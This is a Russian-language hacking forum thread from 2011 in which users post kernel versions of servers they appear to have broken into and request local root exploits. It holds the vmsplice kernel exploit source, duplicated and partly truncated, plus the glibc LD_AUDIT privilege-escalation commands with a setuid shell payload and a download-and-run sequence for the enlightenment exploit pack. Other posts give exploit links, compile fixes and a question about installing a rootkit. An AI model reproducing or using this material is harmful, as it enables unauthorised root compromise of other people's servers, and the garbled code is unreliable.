if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE)

vasykas
19.07.2011, 21:12
[QUOTE="sevenup"]
vasykas, вот исправленный код первого сплойта с твоего сообщения:
[CODE]
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
#define PAGE_SIZE getpagesize()
#define __KERNEL__
#include


#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i flags = 1 private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE)
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
#define PAGE_SIZE getpagesize()
#define __KERNEL__
#include


#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i flags = 1 private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE)

sevenup
19.07.2011, 21:51
скомпилился но не помогло


ты просил помочь с ошибками...ты же не думал, что рабочий приватный сплойт будет выложен в паблик с такой смешной недоработкой

C-r-A-c-K
20.07.2011, 15:07
будьте так любезны, подберите сплоит под

OS version: Linux version 2.6.32-3-amd64 (Debian 2.6.32-9) (maks@debian.org) (gcc version 4.3.4 (Debian 4.3.4-8) ) #1 SMP Wed Feb 24 18:07:42 UTC 2010

Distr name: Debian GNU/Linux 6.0

пробовал _1337day.com/exploits/14601

но не разобрался как с ним работать

пробовал r00t.sh (не запустился)

пробовал через libpcprofile.so нет прав на запись..

sevenup
20.07.2011, 17:58
будьте так любезны, подберите сплоит под
OS version: Linux version 2.6.32-3-amd64 (Debian 2.6.32-9) (maks@debian.org) (gcc version 4.3.4 (Debian 4.3.4-8) ) #1 SMP Wed Feb 24 18:07:42 UTC 2010
Distr name: Debian GNU/Linux 6.0
пробовал _1337day.com/exploits/14601
но не разобрался как с ним работать
пробовал r00t.sh (не запустился)
пробовал через libpcprofile.so нет прав на запись..


Судя по вашему сообщению через libpcprofile.so вы пробовали сделать выполнение крон...но данный дистрибутив должен пробиваться стандартным способом баги Glib...

вот перечень команд:


$ mkdir /tmp/exploit

$ ln /bin/ping /tmp/exploit/target

$ exec 3 payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D

$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

C-r-A-c-K
20.07.2011, 19:44
к сожалению такой метод не прошел.

запрещены хард-линки

ОС установленна в отдельный сектор, где не нашел ни единой папки с правами на запись.

посмотрите что-нибудь еще пожалуйста.

sevenup
20.07.2011, 20:21
к сожалению такой метод не прошел.
запрещены хард-линки
ОС установленна в отдельный сектор, где не нашел ни единой папки с правами на запись.
посмотрите что-нибудь еще пожалуйста.


ну прав на запись там и не должно нигде быть..в том методе, права на запись нужны только в папке tmp...а там они всегда есть...

пройбуй роберт ю сак, фулл нельсон.

vasykas
20.07.2011, 21:07
будьте так любезны, подберите сплоит под
OS version: Linux version 2.6.32-3-amd64 (Debian 2.6.32-9) (maks@debian.org) (gcc version 4.3.4 (Debian 4.3.4-8) ) #1 SMP Wed Feb 24 18:07:42 UTC 2010
Distr name: Debian GNU/Linux 6.0
пробовал _1337day.com/exploits/14601
но не разобрался как с ним работать
пробовал r00t.sh (не запустился)
пробовал через libpcprofile.so нет прав на запись..


это не поможет?

http://turboupload.com/n0f9pp2a1udn

C-r-A-c-K
21.07.2011, 02:43
vasykas, спасибо

помог сплоит ia32syscall emulation

exmicru
22.07.2011, 21:24
Linux ****** 2.6.32.38-bitrix10 #1 SMP Fri Apr 22 04:08:18 MSD 2011 x86_64

Подскажите сплойт.

C-r-A-c-K
22.07.2011, 21:28
exmicru, имхо не найдешь, слишком свежий.

Уважаемые постояльцы, подскажите что-нибудь для

Linux version 2.6.27.5-117.fc10.x86_64 (mockbuild@x86-1.fedora.phx.redhat.com) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP Tue Nov 18 11:58:53 EST 2008

p.s. при компилировании чего-либо ругается на инклуды /usr/include/string.h:39: error: expected declaration specifiers or '...' before 'size_t' и т.д.

может кто подскажет возможно рабочий вариант, тогда буду эксперементировать уже с библиотеками.

sevenup
22.07.2011, 21:57
exmicru, имхо не найдешь, слишком свежий.
Уважаемые постояльцы, подскажите что-нибудь для
Linux version 2.6.27.5-117.fc10.x86_64 (mockbuild@x86-1.fedora.phx.redhat.com) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP Tue Nov 18 11:58:53 EST 2008
p.s. при компилировании чего-либо ругается на инклуды /usr/include/string.h:39: error: expected declaration specifiers or '...' before 'size_t' и т.д.
может кто подскажет возможно рабочий вариант, тогда буду эксперементировать уже с библиотеками.


Enlightenment, Glib

ne0k
26.07.2011, 20:51
Подскажите, что можно тут попробовать?

FreeBSD ****** 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Thu Oct 26 14:44:23 PDT 2006

vasykas
26.07.2011, 21:03
Подскажите, что можно тут попробовать?
FreeBSD ****** 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Thu Oct 26 14:44:23 PDT 2006


http://www.securitylab.ru/poc/275399.php

http://www.exploit-db.com/exploits/9488/

http://security-sh3ll.blogspot.com/2009/08/freebsd-61-local-root-vulnerability.html

http://forum.intern0t.net/exploits-vulnerabilities-pocs/1302-freebsd-6-1-local-root-vulnerability-0-day.html

че нибудь здесь посмотри

ne0k
26.07.2011, 21:29
Не один из них так и не скомпилился.. Ошибки валятся.. Могу привести их сюда, если необходимо..

vasykas
26.07.2011, 21:35
Не один из них так и не скомпилился.. Ошибки валятся.. Могу привести их сюда, если необходимо..


давай

ne0k
26.07.2011, 22:36
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1302-freebsd-6-1-local-root-vulnerability-0-day.html

###########################

1.c: In function `main':

1.c:73: warning: assignment from incompatible pointer type

1.c:83: warning: passing arg 3 of `pthread_create' from incompatible pointer type

1.c:84: warning: passing arg 3 of `pthread_create' from incompatible pointer type

1.c:107:2: warning: no newline at end of file

/var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':

: undefined reference to `pthread_create'

/var/tmp//ccvijMZ6.o(.text+0x203): In function `main':

: undefined reference to `pthread_create'

###########################

http://www.exploit-db.com/exploits/9488/

############################

/var/tmp//ccOFVRly.o(.text+0x1dd): In function `main':

: undefined reference to `pthread_create'

/var/tmp//ccOFVRly.o(.text+0x1f2): In function `main':

: undefined reference to `pthread_create'

############################

По одному из линков вообще ДоС..

з.ы. Не ругаться, я в Си подобных языках вообще ноль.

sevenup
27.07.2011, 00:40
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1302-freebsd-6-1-local-root-vulnerability-0-day.html
###########################
1.c: In function `main':
1.c:73: warning: assignment from incompatible pointer type
1.c:83: warning: passing arg 3 of `pthread_create' from incompatible pointer type
1.c:84: warning: passing arg 3 of `pthread_create' from incompatible pointer type
1.c:107:2: warning: no newline at end of file
/var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccvijMZ6.o(.text+0x203): In function `main':
: undefined reference to `pthread_create'
###########################
http://www.exploit-db.com/exploits/9488/
############################
/var/tmp//ccOFVRly.o(.text+0x1dd): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccOFVRly.o(.text+0x1f2): In function `main':
: undefined reference to `pthread_create'
############################
По одному из линков вообще ДоС..
з.ы. Не ругаться, я в Си подобных языках вообще ноль.


А гугл переводчик использовать, религия не позволяет ?

по первой ошибке...

В конце файла добавь пустую строку, как просит компилятор...

снова скомпилируй и запускай....

P.S. Если выскакивают при компиляции warning сообщения, это не мешает сплойту скомпилится!

ne0k
27.07.2011, 15:32
А гугл переводчик использовать, религия не позволяет ?
по первой ошибке...
В конце файла добавь пустую строку, как просит компилятор...
снова скомпилируй и запускай....
P.S. Если выскакивают при компиляции warning сообщения, это не мешает сплойту скомпилится!


Давай не умничать, ок? Причем тут гугл переводчик? Там конкретно ошибка:

/var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':

: undefined reference to `pthread_create'

/var/tmp//ccvijMZ6.o(.text+0x203): In function `main':

: undefined reference to `pthread_create'

И эту лабуду я сам могу перевести, без всяких переводчиков, но толку? Я ясно написал, что в Си подобных языках я ноль, и исправить эту ошибку я не в силах. Если по факту знаешь, в чем ошибка, напиши, буду благодарен.

з.ы.: То, что new line в конце поставить нужно, не сложно догадаться. И опять же, толку?

sevenup
27.07.2011, 16:28
Давай не умничать, ок? Причем тут гугл переводчик? Там конкретно ошибка:
/var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccvijMZ6.o(.text+0x203): In function `main':
: undefined reference to `pthread_create'
И эту лабуду я сам могу перевести, без всяких переводчиков, но толку? Я ясно написал, что в Си подобных языках я ноль, и исправить эту ошибку я не в силах. Если по факту знаешь, в чем ошибка, напиши, буду благодарен.
з.ы.: То, что new line в конце поставить нужно, не сложно догадаться. И опять же, толку?


А кто умничает ?

1. сплойт нужно компилить с флагом -lpthread

2. Твоя ошибка появляется когда этот флаг не используется!

3. Вот строка из man gcc:


-pthread
Adds support for multithreading with the pthreads library. This
option sets flags for both the preprocessor and linker.

4. Сплойт работает на x64 системах.

ne0k
27.07.2011, 21:06
Попробовал с флагом -lpthread, ничего не происходит, никакого output'а..

А под x86 что нибудь есть?

fairy_long_nose
27.07.2011, 23:37
cat /etc/issue;uname -a;id Debian GNU/Linux 3.1 \n \l
Linux sh4-2 2.6.8-13-amd64-k8-smp #1 SMP Wed Feb 20 05:09:36 UTC 2008 x86_64 GNU/Linux
uid=1632(ftp4534534) gid=100(users) Gruppen=100(users)


Ни туда, ни сюда... Может я что пропустил? Подскажите что может подойти под него.

sevenup
28.07.2011, 15:32
Ни туда, ни сюда... Может я что пропустил? Подскажите что может подойти под него.


Попробуй вот это:

http://webcache.googleusercontent.com/search?q=cache:9Tz4RCIUYLoJ:www.jkmwpkl.gov.my/1.txt+http://www.jkmwpkl.gov.my/1.txt&cd=3&hl=ru&ct=clnk&gl=ua&client=firefox&source=www.google.com.ua

Линк на вебкеш даю т.к. страницы на сайте уже нету...

z0mbyak
28.07.2011, 15:39
Лучше попробуй enlightenment _http://grsecurity.net/~spender/enlightenment.tgz, она точно пробить должна....

Expl0ited
28.07.2011, 16:16
Ни туда, ни сюда... Может я что пропустил? Подскажите что может подойти под него.


1. wget http://www.grsecurity.net/~spender/enlightenment.tgz

2. tar -zxf enlightenment.tgz

3. cd enlightenment

4. ./run_null_exploits.sh

5. ???

6. PROFIT!!!

Сохрани где нибудь, пробив ~ до июня 2009 года

fairy_long_nose
28.07.2011, 22:41
Спасибо ребят, попробую. Сам думал, что 100% должен сработать enlightenment, но не сраслось. Дохрена хидеров не хватает для сборки. Хоть такую же систему поднимай на виртуалке что бы только бинарник собрать ) Чем я наверно сегодня ночью и займусь

vaddd
28.07.2011, 23:37
FreeBSD 7.2-RELEASE-p6


есть ли рабочие сплойты под нее?

sevenup
29.07.2011, 00:19
есть ли рабочие сплойты под нее?


Полный вывод команды uname -a показывать надо!

Покажи вывод команды:


ls-al/libexec;uname-a;

vaddd
29.07.2011, 00:28
FreeBSD x.x.x 7.2-RELEASE-p6 FreeBSD 7.2-RELEASE-p6 #2: Thu Feb 4 14:31:52 MSK 2010 root@x.x.x:/usr/obj/usr/src/sys/RELAY i386


вот результат выполнения обоих комманд

vaddd
29.07.2011, 00:32
туплю...


total 332
drwxr-xr-x 2 root wheel 512 3 |++ 2010 .
drwxr-xr-x 20 root wheel 512 17 -++ 2011 ..
-r-xr-xr-x 1 root wheel 167292 1 -++ 2010 ld-elf.so.1
-r-xr-xr-x 1 root wheel 167292 29 --- 2009 ld-elf.so.1.old


ls -al /libexec

sevenup
29.07.2011, 00:40
вот результат выполнения обоих комманд


Попробуй вот этот:

_http://cworld.org.ua/news/exploit-fbsd-rtld-full-package/

если не возьмёт, тогда вот этот:

_http://rdot.org/forum/showthread.php?t=601

P.S. второй сплойт там в 3-х вариантах...тему полистай...

z0mbyak
29.07.2011, 00:45
Сохрани где нибудь, пробив ~ до июня 2009 года


Поправочка, приблизительно до начала 2010, там же еще Pipe.c)

plaeer
29.07.2011, 12:27
FreeBSD --- 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008

Что под этот взять?

z0mbyak
29.07.2011, 17:05
FreeBSD --- 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008




Попробуй вот этот:
_http://cworld.org.ua/news/exploit-fbsd-rtld-full-package/
если не возьмёт, тогда вот этот:
_http://rdot.org/forum/showthread.php?t=601


Ну и http://1337day.com/exploits/8002

http://1337day.com/exploits/7910

попробуй...

P.S. Выкладывай полностью сведения о системе.

plaeer
29.07.2011, 17:43
Ну и http://1337day.com/exploits/8002
http://1337day.com/exploits/7910
попробуй...
P.S. Выкладывай полностью сведения о системе.


FreeBSD --- 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386

sevenup
29.07.2011, 20:32
FreeBSD --- 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008
Что под этот взять?


Вот этот пробьёт:

http://www.exploit-db.com/exploits/10255/

Koren
02.08.2011, 04:58
Linux 2.6.9-023stab053.2-enterprise #1 SMP Mon Oct 25 18:37:43 MSD

2010 i686 будет что под него?

vasykas
02.08.2011, 06:58
Linux 2.6.9-023stab053.2-enterprise #1 SMP Mon Oct 25 18:37:43 MSD
2010 i686 будет что под него?


http://turboupload.com/qb7qlb5ctfhf

попробуй эти

soalnk
02.08.2011, 20:11
Linux version 2.6.18-194.11.4.el5 (mockbuild@builder10.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Tue Sep 21 05:04:09 EDT 2010

Посмотрите у кого что есть

Expl0ited
02.08.2011, 20:12
Linux version 2.6.18-194.11.4.el5 (mockbuild@builder10.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Tue Sep 21 05:04:09 EDT 2010
Посмотрите у кого что есть


df -h

ls -lia /lib/libc*

кинь

DJ ][akep
03.08.2011, 15:15
ЧТо подойдет под:

Linux v3 2.6.32-4-pve #1


$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 75G 3.3G 72G 5% /
tmpfs 1.5G 0 1.5G 0% /lib/init/rw
tmpfs 1.5G 0 1.5G 0% /dev/shm
$ ls -lia /lib/libc*
28819996 -rwxr-xr-x 1 root root 1294572 Jan 8 2011 /lib/libc-2.7.so
28819912 lrwxrwxrwx 1 root root 11 Jul 18 22:40 /lib/libc.so.6 -> libc-2.7.so
28819985 lrwxrwxrwx 1 root root 14 Jul 18 22:40 /lib/libcap.so.1 -> libcap.so.1.10
28820010 -rw-r--r-- 1 root root 11024 Apr 13 2004 /lib/libcap.so.1.10
28819925 lrwxrwxrwx 1 root root 14 Jul 18 22:40 /lib/libcap.so.2 -> libcap.so.2.11
28819820 -rw-r--r-- 1 root root 13364 Jul 26 2008 /lib/libcap.so.2.11
28820070 lrwxrwxrwx 1 root root 17 Jul 18 22:40 /lib/libcfont.so.0 -> libcfont.so.0.0.0
28819814 -rw-r--r-- 1 root root 10712 Apr 15 2008 /lib/libcfont.so.0.0.0
28819800 -rw-r--r-- 1 root root 185816 Jan 8 2011 /lib/libcidn-2.7.so
28819923 lrwxrwxrwx 1 root root 14 Jul 18 22:40 /lib/libcidn.so.1 -> libcidn-2.7.so
28820007 lrwxrwxrwx 1 root root 17 Jul 18 22:40 /lib/libcom_err.so.2 -> libcom_err.so.2.1
28819797 -rw-r--r-- 1 root root 8676 Oct 13 2008 /lib/libcom_err.so.2.1
28819926 lrwxrwxrwx 1 root root 19 Jul 18 22:40 /lib/libconsole.so.0 -> libconsole.so.0.0.0
28819991 -rw-r--r-- 1 root root 72816 Apr 15 2008 /lib/libconsole.so.0.0.0
28819981 -rw-r--r-- 1 root root 38296 Jan 8 2011 /lib/libcrypt-2.7.so
28820011 lrwxrwxrwx 1 root root 15 Jul 18 22:40 /lib/libcrypt.so.1 -> libcrypt-2.7.so
28819811 lrwxrwxrwx 1 root root 19 Jul 18 22:40 /lib/libctutils.so.0 -> libctutils.so.0.0.0
28819805 -rw-r--r-- 1 root root 17024 Apr 15 2008 /lib/libctutils.so.0.0.0

Expl0ited
03.08.2011, 15:45
[akep"]
DJ ][akep said:
ЧТо подойдет под:
Linux v3 2.6.32-4-pve #1


uname -a

vasykas
04.08.2011, 21:31
есть че нибудь

Linux 2.6.26.8-57.fc8PAE #1 SMP Thu Dec 18 EST 2008 i686 i686 i386 GNU/Linux

стандартные типа sendpage 1,2,3 robert_you suck не подходят

sevenup
04.08.2011, 22:11
есть че нибудь
Linux 2.6.26.8-57.fc8PAE #1 SMP Thu Dec 18 EST 2008 i686 i686 i386 GNU/Linux
стандартные типа sendpage 1,2,3 robert_you suck не подходят


Glibc должен взять

vasykas
04.08.2011, 22:25
Glibc должен взять


ни Glibc не берет ни Fuzzing

cashm
06.08.2011, 19:30
srochno podskazhite pod eto:

Linux s206 2.6.26-2-amd64 #1 SMP Mon Jun 13 16:29:33 UTC 2011 x86_64

sevenup
06.08.2011, 20:39
srochno podskazhite pod eto:
Linux s206 2.6.26-2-amd64 #1 SMP Mon Jun 13 16:29:33 UTC 2011 x86_64


ничего. не рутабельное ядро.

C-r-A-c-K
07.08.2011, 10:54
Люди добрые. откомпилируйте сплойт _exploit-db.com/exploits/15024/

на ядре Fedora release 10. 2.6.27.5-117.fc10.x86_64 #1 SMP Tue Nov 18 11:58:53 EST 2008 x86_64

или около того. админ злой, все инклюды поломал) либо кто-то, кто до меня порутал.

sevenup
07.08.2011, 11:40
Люди добрые. откомпилируйте сплойт _exploit-db.com/exploits/15024/
на ядре Fedora release 10. 2.6.27.5-117.fc10.x86_64 #1 SMP Tue Nov 18 11:58:53 EST 2008 x86_64
или около того. админ злой, все инклюды поломал) либо кто-то, кто до меня порутал.


он не работает на федоре...там шелл коды править нужно!

На твоём ядре должен работать Glibc..

C-r-A-c-K
07.08.2011, 14:15
sevenup, будь добр откомпилируй на glibs на подобном ядре.

gcc ругается на любые инклюды.

Expl0ited
07.08.2011, 14:49
там только откомпилировать нужно:


void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}

C-r-A-c-K
07.08.2011, 15:05
там только откомпилировать нужно:

void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}



при компиляции выдает

collect2: cannot find 'ld'

будьте добры, откомпилируйте, и скиньте у кого получилось.

vasykas
07.08.2011, 22:12
$ id

uid=0(root) gid=0(root) grupos=48(apache),11193(ftpgroup1)

не могу руткит поставить с такими правами, почему?

winstrool
08.08.2011, 03:01
FreeBSD *** 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009


с эти кто может помочь?

GroM88
08.08.2011, 15:19
народ) мб есть у кого линк на видео по рутанью. ну т.е. что бы я хоть как то вник как рутать)

абвгдешка
08.08.2011, 15:50
народ) мб есть у кого линк на видео по рутанью. ну т.е. что бы я хоть как то вник как рутать)


/thread222922.html

XAMEHA
08.08.2011, 15:55
с эти кто может помочь?


http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+attackvector+%28Attack+Vector %29

http://seclists.org/fulldisclosure/2009/Nov/371

GroM88
08.08.2011, 17:37
Есть что под это?

Linux 2.6.18-194.3.1.el5.028stab069ave01.6ent #1 SMP Sun May 30 21:22:39 CEST 2010 i686 i686 i386 GNU/Linux

antiaudomain
09.08.2011, 06:18
Всем привет!

Кто-нибудь таки подобрал что-нибудь под

Linux ******** 2.6.9-89.0.11.EL #1 Mon Aug 31 10:56:13 EDT 2009 i686 athlon i386 GNU/Linux

? очень-очень надо, ответа так и не нашел, перепробовал кучу тоже (

Konqi
09.08.2011, 11:07
Всем привет!
Кто-нибудь таки подобрал что-нибудь под
Linux ******** 2.6.9-89.0.11.EL #1 Mon Aug 31 10:56:13 EDT 2009 i686 athlon i386 GNU/Linux
? очень-очень надо, ответа так и не нашел, перепробовал кучу тоже (


glibc может взять, пробовали?

z0mbyak
09.08.2011, 17:36
А ты пробовал enlightenment (мой любимый сплоитпак), судя по году должен помочь...

antiaudomain
09.08.2011, 20:29
А ты пробовал enlightenment (мой любимый сплоитпак), судя по году должен помочь...


они проапгрейдились уже до:

2.6.9-89.33.1.EL #1 Mon Nov 15 18:45:41 EST 2010 i686

что посоветуете, люди добрые?

sevenup
09.08.2011, 21:48
